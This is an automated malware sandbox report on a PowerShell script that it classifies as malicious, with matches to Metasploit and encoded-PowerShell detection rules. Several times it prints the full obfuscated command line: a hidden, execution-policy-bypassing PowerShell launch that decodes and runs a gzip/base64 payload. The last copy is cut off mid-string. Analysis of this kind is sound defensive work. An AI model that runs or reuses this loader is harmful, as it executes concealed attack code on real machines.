Source: 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7532, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7760, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winPS1@8/15@0/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF594778.TMPJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fknazxxb.my5.ps1Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: x6bjOrKFQn.ps1ReversingLabs: Detection: 26%
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\x6bjOrKFQn.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.cmdline"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES45B2.tmp" "c:\Users\user\AppData\Local\Temp\jntjspe1\CSCD361E481240445E599A964E0407F16C0.TMP"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbR] source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dbpdbtem.pdb source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbt\ source: powershell.exe, 00000004.00000002.1893833318.000001E27617E000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbc~ source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdbA source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdb source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbl source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: 7C:\Users\user\AppData\Local\Temp\jntjspe1\jntjspe1.pdbhP source: powershell.exe, 00000000.00000002.1748447398.000001FDE7C72000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.pdbs\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000004.00000002.1893833318.000001E2761A6000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMy
Obfuscated command line found
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ3IP+4PEne8KlRr+fsh3r66lrmPbOSo1c1xeV/7XObK74p'+'nb+svoXSh3FRKgIAAA{0}')-f'=','Q','9')))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -nop -w hidden -noni -ep bypass "&([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String((('H4sIAANCGWcCA5VVXW/jNhB8{2}6{2}YGG'+'ojITL'+'huEFxDZBDXV2uCJDeGae0eTAMhKbW'+'sRqadEkqtpH4v5eUqA/HCdrTgy1xl8Ph7Cy5KA{1}zuRTwO5rBHc4Zz1EY6D33wD7BhsElfMHN4Ov8b2{1}GBre7NX6hK7SDhtj8pMyvk8mfGj/hghbcJAozG8kp1xYiMKrAJmui5HZ'+'HXmXY8c5Indvb{2}xY1xbXcoLJflh2U8{1}lVdBVW7{2}PUqFw8zIJErlZUZPHhaKo5k+LV4Ce5EVzSrByNPKaSDLUGL8BKZgVHR/DXMIIqJV{2}AWC8DA/wH+vNcZP2oDFbzyrk8'+'1wYFKjt5mu'+'7s+4o41VLJHtFocsvWNz5jdn7+0/E8og1Vxi3rFy6jvkKXnbwxY7g2Fq+qRlgx2b/HVuETKo3HhBvoTsXfIp5M/EL{2}0fBncn5GRsMP5MMv/dhuw6/dq+TTRiFd'+'ObIVNrE2S8sxS7KlV1WnYuec0vfF6HDTmqc12Dv0kBUqNzuS1qmhXz8OFtZSGIfPwa1F38OAapgezPmGK2kw{1}WXyRc6owb8ozzPqfJd{1}zueUPc6i6A06ZFyYpTOtmzTW7wgTiILzuG+4Phv1PZ0uWiNTu82ujtP5zuB0NgvcvzPjkFho+7z88Dzce6lR'+'ZHU4nBrcGoKCycw5/eJinCbX15GT/zeXE/bvrGXlRsPENVW6RM5BFULYbLDiFNratg+nEKB4unBfwjX{2}qR2zdWoCTK7WhWmD{2}yKR653KH5YGwiSCP3KmpJYLA4lUa6lKP{1}mM3WIuSYNCi/2EGbkX{2'+'}8I70stB7mxlMGw3Fg/j{2}oPcoHgwy66L6nbu+ujIRt+n0vR0BjcW0snijwLS8Px+rvWsz1JdUba0nCt{1}yEVz1LRZLW33hAcndETq3VaHWY0UvVyLJ/mIg6vt2mqrrd4Nyr5rqc0y5xiG{1}V66rtrEN6RZWHkshmEMw{1}H7CAYCYXgk6ZXTD7Nbq+V7l4XvUpdCSo2vvOYtiu016qh00PxhUe6uFhWCPHpVTd'+'uarphH+4ZBfepV4KOPP57BC3wtzKBCBW+eA6gRlILUwKdwMknhxP6X+t{2}IVno4IhNqli76EU5akK0jEqBSUk2Hs4PFOqzLOGEcq{1}qjtx'+'hcdj{2}sq217xw'+'b+X/5tYf7TsV3DHvm1nvOZF3rZ